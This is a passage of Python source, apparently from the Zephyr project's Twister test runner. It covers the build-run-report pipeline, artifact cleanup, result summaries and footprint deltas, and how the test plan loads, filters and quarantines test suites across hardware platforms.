self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
if(self.seed is not None and instance.platform.name.startswith("native_posix")):
self.parse_generated()
if('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda ts: ts.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
